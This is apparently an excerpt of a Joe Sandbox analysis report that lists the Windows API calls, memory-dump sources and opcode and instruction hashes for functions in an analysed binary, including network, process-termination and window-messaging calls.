• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b6728b233dffce4121d08cf8c744eda7549f5856364257d950545329bf42e88
                                                                                                                                                                                                                                                                                                    • Instruction ID: 02f07a8742f7de6fa54cc8ab47f4e554f5e2da3614ecaee9e6ee7158cf07baaa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6728b233dffce4121d08cf8c744eda7549f5856364257d950545329bf42e88
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6511E9766C4307B9FB246724DC07EAB37ACDF157A4F20C013F50AE50D1FB61A8414614
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A1758D
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A175CE
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00A175F6
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A1773A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A1775B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 079b8d96489a0499aab48d85ec29b18ac1cea343745ec656df731b470a287bc8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 61105b3c2b44d28cba3686ca3cdafc480839c33066e940745478c7f1a484ca97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 079b8d96489a0499aab48d85ec29b18ac1cea343745ec656df731b470a287bc8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C17C3990465AEFDB10CFA8C940BEDBBF1FF18310F14941AE8A5E7250DB34A995DB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8bb4becd24f7677ff72a3039e994b4425428f0026ea903aaf3676778152a6e75
                                                                                                                                                                                                                                                                                                    • Instruction ID: 44b97dcd2613ecfe4cc124f69c78d428f73af259a01735e334c9157e7bc43e74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bb4becd24f7677ff72a3039e994b4425428f0026ea903aaf3676778152a6e75
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92613879E04350AFDF22AFB8DDC17AE7BA4EF81320F14016DF944AB285E77198018791
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AA5C24
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00AA5C65
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00AA5C6B
                                                                                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AA5C6F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA79F2: DeleteObject.GDI32(00000000), ref: 00AA7A1E
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA5CAB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA5CB8
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AA5CEB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AA5D25
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AA5D34
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 21ba78be6866609ce18f4e13c2e74088777843590e619f50b46dd98a2f7b7285
                                                                                                                                                                                                                                                                                                    • Instruction ID: e279b0fb55d71c12f43bee0fe8c8c9cdd852fc47d4dd346c8c62cc5867f6dad7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21ba78be6866609ce18f4e13c2e74088777843590e619f50b46dd98a2f7b7285
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C551DD30E80B09BFEF249FB4CC49BD83BA1BB06360F104116F6259B1E1D775A980DB58
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A528D1
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A528EA
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A528FA
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A52912
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A52933
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A52942
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A5295F
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A5296E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 71b2dfeb3f3308d0f0c5e9f7938a9a866564861606cc715f8601a0b5723f3417
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b856a488dadcabefe16b2b6847a6ac7799e10504dd738095b82f15ae52718a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71b2dfeb3f3308d0f0c5e9f7938a9a866564861606cc715f8601a0b5723f3417
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89518870A0020AEFDB24CF65CC85BAA7BB5FF49720F104528FA529B6E0D770E991DB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A8CBC7
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A8CBDA
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00A8CBEE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8CCB7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: GetLastError.KERNEL32 ref: 00A8CD67
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: SetEvent.KERNEL32(?), ref: 00A8CD7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: InternetCloseHandle.WININET(00000000), ref: 00A8CD86
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 14d2259947a67a3d014261894e01f8219629d36c27d56861e6c092a472ac1357
                                                                                                                                                                                                                                                                                                    • Instruction ID: 30ebd9b5cefcae143b440ab6c5608459ce28790c6eb798b651e7fbf233fbca5a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14d2259947a67a3d014261894e01f8219629d36c27d56861e6c092a472ac1357
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5316DB1500705AFDB21AFB1CD44A67BBB8FF45320B04451DF89A86A50C731D915EF60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A743AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetCurrentThreadId.KERNEL32 ref: 00A743B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A72F00), ref: 00A743BB
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A72F0A
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A72F28
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A72F2C
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A72F36
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A72F4E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A72F52
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A72F5C
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A72F70
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A72F74
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 81d75e7858e23b751fd7811fdcd4e862f61f6a943673e3e3406e57e2872f43bb
                                                                                                                                                                                                                                                                                                    • Instruction ID: fe5c75d99eb8cde643810a2a535355eb0a7194f8e89cdafa2abd4d7b7a1f5106
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81d75e7858e23b751fd7811fdcd4e862f61f6a943673e3e3406e57e2872f43bb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC01D8307942107BFB1067A89C8AF593F59DB4EB12F104015F35DAE1E0CAE254458EA9
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A71D95,?,?,00000000), ref: 00A72159
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00A71D95,?,?,00000000), ref: 00A72160
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A71D95,?,?,00000000), ref: 00A72175
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00A71D95,?,?,00000000), ref: 00A7217D
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00A71D95,?,?,00000000), ref: 00A72180
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A71D95,?,?,00000000), ref: 00A72190
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00A71D95,00000000,?,00A71D95,?,?,00000000), ref: 00A72198
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00A71D95,?,?,00000000), ref: 00A7219B
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00A721C1,00000000,00000000,00000000), ref: 00A721B5
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 98af40613e132e6ba34d0c0c2f237f93e5d1b822d271ac04d217d683559e9b21
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c82e78c7bf2391a79acabcba28830bce6fb330663351075a0b9d7d30f208cf5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98af40613e132e6ba34d0c0c2f237f93e5d1b822d271ac04d217d683559e9b21
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501A8B5240305BFEA10EBA5DC4DF6B7BACEB89711F418511FA45DB5E1DB709801CB20
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00A7DDAC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00A7DDBA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DD87: CloseHandle.KERNEL32(00000000), ref: 00A7DE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9ABCA
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A9ABDD
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9AC10
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A9ACC5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00A9ACD0
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9AD21
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                    • Opcode ID: 264804090d13d7f56c50d9a80380a3a8ca1a36347a25ac2befef7133ef839c1f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2a39bcf4e2df9682838183806fc203a9ad35797ea0af65f91fa6f09cb3e7a09b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 264804090d13d7f56c50d9a80380a3a8ca1a36347a25ac2befef7133ef839c1f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93619E74208242AFDB10DF54C594F65BBE1AF54308F58849DE8A64FBA2C771EC85CBD2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AA43C1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AA43D6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AA43F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA4435
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AA4462
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AA4490
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3a9015a98f39ff9fe1291666eb7841754d670cc9457c096911484a116035b6d3
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8582b1ab8da18c4f14a489744915aea2ced1d62f22bbf39e0b4d472d4d559a21
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a9015a98f39ff9fe1291666eb7841754d670cc9457c096911484a116035b6d3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41AE71900309ABDF21DFA4CC49BEA7BA9FB4D350F10052AF955EB2D1D7B59980CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A7C6C4
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00A7C6E4
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00A7C71A
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(01266C50), ref: 00A7C76B
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(01266C50,?,00000001,00000030), ref: 00A7C793
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$2
                                                                                                                                                                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                    • Opcode ID: e4157b894a2bdf626a6851bc3ebe0301702f852e7852e67e23bf4a37a5d7064b
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfad9ccdecd60389bb5eeb766fd33d31be2ee9b096fa40115c07195cea60b209
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4157b894a2bdf626a6851bc3ebe0301702f852e7852e67e23bf4a37a5d7064b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6519070A002059BDF18CFA8DD84BAEBBF9AF45324F24C11EE95997291EB709941CF51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00A7D1BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a1aa02da4311bf683ca14c0c8660a341523c3851ab49f22f4861c34875419f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: ca1f30031d8a00cd7f77c80ba292ff6edd70353ca9c9a56de9d6b4ce3c83b1e4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a1aa02da4311bf683ca14c0c8660a341523c3851ab49f22f4861c34875419f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11E93534C306BEE7095B54DC82DAE77BC9F19B60F60C52BF90DA62C1F7B4AA404260
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                    • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                    • Opcode ID: 388bffe79fd90f79f61311a099c6ce3fca213b87c6571df639e2991b1047533d
                                                                                                                                                                                                                                                                                                    • Instruction ID: aa1d4366263afea8b207e55f8eca335ea42b834afc408277416e42b6d4e4bd05
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 388bffe79fd90f79f61311a099c6ce3fca213b87c6571df639e2991b1047533d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F112C315001157FCB28E770DD4AEDE777CEF09714F0080A6F54AA6091EF749A82D750
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 018a404c302df4119bf1afbceaa185cdbb8695ae519f19ef9c5294b164224bae
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c414e960a75b43029ef4b0657292d337ff3e6effa31f79b2307dbdf5cf77871
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 018a404c302df4119bf1afbceaa185cdbb8695ae519f19ef9c5294b164224bae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B418F65C11614B9CB15EBB98D8BACFB7A8AF05310F50C866F518E3121FB34E365C3A6
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00A2FC41
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00A6FC15
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00A6FC98
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b855c4cfe9cccaaf6553f23434a93da7263a91757d62fa935fdce273c2b8e48a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2bbba98a2179e96904e5559ba541117525246000dbf876270bcbd904271e328d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b855c4cfe9cccaaf6553f23434a93da7263a91757d62fa935fdce273c2b8e48a
